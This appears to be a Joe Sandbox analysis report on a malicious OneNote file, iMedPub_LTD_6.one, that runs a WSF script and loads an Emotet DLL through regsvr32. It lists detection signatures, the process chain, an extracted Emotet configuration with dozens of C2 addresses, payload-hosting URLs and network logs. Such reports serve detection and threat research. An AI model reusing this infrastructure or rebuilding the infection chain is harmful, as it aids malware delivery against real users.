Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iMedPub_LTD_6.one

Overview

General Information

Sample Name:iMedPub_LTD_6.one
Analysis ID:828505
MD5:4f69e6051723ee2f829d1e5f31463768
SHA1:812424b2c260ed959ee81c5eb8ac160ea61b31ec
SHA256:085ac1d179a061584f0bee7670d97af843d4a267ca343a884e5a2f462e3da5c8
Tags:one
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Malicious OneNote
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Creates a start menu entry (Start Menu\Programs\Startup)
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • ONENOTE.EXE (PID: 1236 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\iMedPub_LTD_6.one MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • wscript.exe (PID: 4440 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • regsvr32.exe (PID: 3644 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
        • regsvr32.exe (PID: 1276 cmdline: "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
          • regsvr32.exe (PID: 3092 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\JURwocL\wAXwf.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • ONENOTEM.EXE (PID: 5908 cmdline: /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
EmotetWhile Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet

Malware Configuration

Threatname: Emotet

{"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5pF0LTQAJAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2lV0YTQAGAJA="]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
iMedPub_LTD_6.oneJoeSecurity_MalOneNoteYara detected Malicious OneNoteJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmpWEBSHELL_asp_genericGeneric ASP webshell which uses any eval/exec function indirectly on user input or writes a fileArnim Rupp
    • 0x11be:$asp_gen_obf1: "+"
    • 0x11ee:$asp_gen_obf1: "+"
    • 0x12826:$asp_gen_obf1: "+"
    • 0x12856:$asp_gen_obf1: "+"
    • 0x5ff0:$tagasp_short1: <%\xB2
    • 0xb0a:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
    • 0xc2a:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
    • 0x1652:$jsp4: public
    • 0x1c92:$jsp4: public
    • 0x12cba:$jsp4: public
    • 0x132fa:$jsp4: public
    • 0xfd2:$asp_input1: request
    • 0x1800:$asp_input1: request
    • 0x1842:$asp_input1: request
    • 0x1958:$asp_input1: request
    • 0x1263a:$asp_input1: request
    • 0x12e68:$asp_input1: request
    • 0x12eaa:$asp_input1: request
    • 0x12fc0:$asp_input1: request
    • 0x130c:$asp_payload11: wscript.shell
    • 0x12974:$asp_payload11: wscript.shell
    00000004.00000002.884606012.0000000000C30000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000003.00000002.382454189.0000000001290000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000004.00000002.884803420.0000000000C68000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Emotet_3Yara detected EmotetJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.regsvr32.exe.1290000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              4.2.regsvr32.exe.c30000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                4.2.regsvr32.exe.c30000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  3.2.regsvr32.exe.1290000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security

                    Sigma Signatures

                    Malware Analysis System Evasion

                    barindex
                    Sigma detected: Run temp file via regsvr32
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 4440, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll, ProcessId: 3644, ProcessName: regsvr32.exe

                    Snort Signatures

                    Timestamp:192.168.2.4182.162.143.56497004432404312 03/17/23-09:24:11.489145
                    SID:2404312
                    Source Port:49700
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4167.172.199.1654970280802404308 03/17/23-09:24:23.731826
                    SID:2404308
                    Source Port:49702
                    Destination Port:8080
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.445.235.8.304973580802404324 03/17/23-09:27:11.247095
                    SID:2404324
                    Source Port:49735
                    Destination Port:8080
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4213.239.212.5497314432404320 03/17/23-09:27:05.747710
                    SID:2404320
                    Source Port:49731
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4104.168.155.1434970780802404302 03/17/23-09:24:37.030137
                    SID:2404302
                    Source Port:49707
                    Destination Port:8080
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4206.189.28.1994972380802404318 03/17/23-09:26:11.494660
                    SID:2404318
                    Source Port:49723
                    Destination Port:8080
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.491.121.146.474969780802404344 03/17/23-09:23:59.776237
                    SID:2404344
                    Source Port:49697
                    Destination Port:8080
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.466.228.32.314969970802404330 03/17/23-09:24:06.184104
                    SID:2404330
                    Source Port:49699
                    Destination Port:7080
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for submitted file
                    Source: iMedPub_LTD_6.oneReversingLabs: Detection: 30%
                    Source: iMedPub_LTD_6.oneVirustotal: Detection: 40%Perma Link
                    Antivirus detection for URL or domain
                    Source: https://182.162.143.56/xqnhpb/Avira URL Cloud: Label: malware
                    Source: http://ozmeydan.com/cekici/9/Avira URL Cloud: Label: malware
                    Source: https://91.207.28.33:8080/Avira URL Cloud: Label: malware
                    Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/Avira URL Cloud: Label: malware
                    Source: https://penshorn.org/admin/Ses8712iGR8du/tMAvira URL Cloud: Label: malware
                    Source: https://213.239.212.5/xqnhpb/lAvira URL Cloud: Label: malware
                    Source: https://159.89.202.34:443/xqnhpb/b/Avira URL Cloud: Label: malware
                    Source: https://213.239.212.5/xqnhpb/vAvira URL Cloud: Label: malware
                    Source: https://186.194.240.217/xqnhpb//Avira URL Cloud: Label: malware
                    Source: https://169.57.156.166:8080/xqnhpb/Avira URL Cloud: Label: malware
                    Source: https://107.170.39.149:8080/$Avira URL Cloud: Label: malware
                    Source: https://91.121.146.47:8080/xqnhpb/tGAvira URL Cloud: Label: malware
                    Source: https://91.121.146.47:8080/xqnhpb/ZAvira URL Cloud: Label: malware
                    Source: https://149.56.131.28:8080/Avira URL Cloud: Label: malware
                    Source: https://213.239.212.5:443/xqnhpb/Avira URL Cloud: Label: malware
                    Source: https://45.235.8.30:8080/Avira URL Cloud: Label: malware
                    Source: https://www.gomespontes.com.br/logs/pd/Avira URL Cloud: Label: malware
                    Source: https://45.235.8.30:8080/xqnhpb/Avira URL Cloud: Label: malware
                    Source: https://82.223.21.224:8080/xqnhpb/Avira URL Cloud: Label: malware
                    Source: https://91.121.146.47:8080/xqnhpb/%%Avira URL Cloud: Label: malware
                    Source: http://ozmeydan.com/cekici/9/xMAvira URL Cloud: Label: malware
                    Source: https://213.239.212.5///Avira URL Cloud: Label: malware
                    Source: https://penshorn.org:443/admin/Ses8712iGR8du/Avira URL Cloud: Label: malware
                    Source: https://45.235.8.30:8080/xqnhpb/b/4Avira URL Cloud: Label: malware
                    Source: https://103.43.75.120/PAvira URL Cloud: Label: malware
                    Source: http://softwareulike.com/cWIYxWMPkK/Avira URL Cloud: Label: malware
                    Source: https://45.235.8.30:8080/xqnhpb//Avira URL Cloud: Label: malware
                    Multi AV Scanner detection for domain / URL
                    Source: penshorn.orgVirustotal: Detection: 10%Perma Link
                    Source: https://91.207.28.33:8080/Virustotal: Detection: 16%Perma Link
                    Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/Virustotal: Detection: 20%Perma Link
                    Source: https://penshorn.org/Virustotal: Detection: 7%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dllReversingLabs: Detection: 58%
                    Source: C:\Windows\System32\JURwocL\wAXwf.dll (copy)ReversingLabs: Detection: 58%
                    Source: 00000004.00000002.884803420.0000000000C68000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5pF0LTQAJAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2lV0YTQAGAJA="]}
                    Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49696 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.4:49700 version: TLS 1.2
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D28 FindFirstFileExW,3_2_0000000180008D28

                    Software Vulnerabilities

                    barindex
                    Document exploit detected (process start blacklist hit)
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe

                    Networking

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.65.88.10 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 213.239.212.5 443Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: penshorn.org
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 186.194.240.217 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.89.202.34 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 160.16.142.56 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.207.28.33 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 103.43.75.120 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 45.235.8.30 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 72.15.201.15 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 206.189.28.199 8080Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 203.26.41.131 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 107.170.39.149 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 82.223.21.224 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 149.56.131.28 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 169.57.156.166 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 1.234.2.232 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080Jump to behavior
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.4:49700 -> 182.162.143.56:443
                    Source: TrafficSnort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.4:49697 -> 91.121.146.47:8080
                    Source: TrafficSnort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.4:49699 -> 66.228.32.31:7080
                    Source: TrafficSnort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.4:49702 -> 167.172.199.165:8080
                    Source: TrafficSnort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.4:49707 -> 104.168.155.143:8080
                    Source: TrafficSnort IDS: 2404318 ET CNC Feodo Tracker Reported CnC Server TCP group 10 192.168.2.4:49723 -> 206.189.28.199:8080
                    Source: TrafficSnort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.4:49731 -> 213.239.212.5:443
                    Source: TrafficSnort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.4:49735 -> 45.235.8.30:8080
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorIPs: 91.121.146.47:8080
                    Source: Malware configuration extractorIPs: 66.228.32.31:7080
                    Source: Malware configuration extractorIPs: 182.162.143.56:443
                    Source: Malware configuration extractorIPs: 187.63.160.88:80
                    Source: Malware configuration extractorIPs: 167.172.199.165:8080
                    Source: Malware configuration extractorIPs: 164.90.222.65:443
                    Source: Malware configuration extractorIPs: 104.168.155.143:8080
                    Source: Malware configuration extractorIPs: 163.44.196.120:8080
                    Source: Malware configuration extractorIPs: 160.16.142.56:8080
                    Source: Malware configuration extractorIPs: 159.89.202.34:443
                    Source: Malware configuration extractorIPs: 159.65.88.10:8080
                    Source: Malware configuration extractorIPs: 186.194.240.217:443
                    Source: Malware configuration extractorIPs: 149.56.131.28:8080
                    Source: Malware configuration extractorIPs: 72.15.201.15:8080
                    Source: Malware configuration extractorIPs: 1.234.2.232:8080
                    Source: Malware configuration extractorIPs: 82.223.21.224:8080
                    Source: Malware configuration extractorIPs: 206.189.28.199:8080
                    Source: Malware configuration extractorIPs: 169.57.156.166:8080
                    Source: Malware configuration extractorIPs: 107.170.39.149:8080
                    Source: Malware configuration extractorIPs: 103.43.75.120:443
                    Source: Malware configuration extractorIPs: 91.207.28.33:8080
                    Source: Malware configuration extractorIPs: 213.239.212.5:443
                    Source: Malware configuration extractorIPs: 45.235.8.30:8080
                    Source: Malware configuration extractorIPs: 119.59.103.152:8080
                    Source: Malware configuration extractorIPs: 164.68.99.3:8080
                    Source: Malware configuration extractorIPs: 95.217.221.146:8080
                    Source: Malware configuration extractorIPs: 153.126.146.25:7080
                    Source: Malware configuration extractorIPs: 197.242.150.244:8080
                    Source: Malware configuration extractorIPs: 202.129.205.3:8080
                    Source: Malware configuration extractorIPs: 103.132.242.26:8080
                    Source: Malware configuration extractorIPs: 139.59.126.41:443
                    Source: Malware configuration extractorIPs: 110.232.117.186:8080
                    Source: Malware configuration extractorIPs: 183.111.227.137:8080
                    Source: Malware configuration extractorIPs: 5.135.159.50:443
                    Source: Malware configuration extractorIPs: 201.94.166.162:443
                    Source: Malware configuration extractorIPs: 103.75.201.2:443
                    Source: Malware configuration extractorIPs: 79.137.35.198:8080
                    Source: Malware configuration extractorIPs: 172.105.226.75:8080
                    Source: Malware configuration extractorIPs: 94.23.45.86:4143
                    Source: Malware configuration extractorIPs: 115.68.227.76:8080
                    Source: Malware configuration extractorIPs: 153.92.5.27:8080
                    Source: Malware configuration extractorIPs: 167.172.253.162:8080
                    Source: Malware configuration extractorIPs: 188.44.20.25:443
                    Source: Malware configuration extractorIPs: 147.139.166.154:8080
                    Source: Malware configuration extractorIPs: 129.232.188.93:443
                    Source: Malware configuration extractorIPs: 173.212.193.249:8080
                    Source: Malware configuration extractorIPs: 185.4.135.165:8080
                    Source: Malware configuration extractorIPs: 45.176.232.124:443
                    Source: Joe Sandbox ViewASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU
                    Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                    Source: global trafficHTTP traffic detected: POST /xqnhpb/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56
                    Source: Joe Sandbox ViewIP Address: 110.232.117.186 110.232.117.186
                    Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
                    Source: global trafficTCP traffic: 192.168.2.4:49697 -> 91.121.146.47:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49699 -> 66.228.32.31:7080
                    Source: global trafficTCP traffic: 192.168.2.4:49702 -> 167.172.199.165:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49707 -> 104.168.155.143:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49708 -> 163.44.196.120:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49709 -> 160.16.142.56:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49714 -> 159.65.88.10:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49719 -> 149.56.131.28:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49720 -> 72.15.201.15:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49721 -> 1.234.2.232:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49722 -> 82.223.21.224:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49723 -> 206.189.28.199:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49724 -> 169.57.156.166:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49725 -> 107.170.39.149:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.207.28.33:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49735 -> 45.235.8.30:8080
                    Source: unknownNetwork traffic detected: IP country count 17
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                    Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                    Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                    Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                    Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                    Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                    Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                    Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                    Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                    Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                    Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                    Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
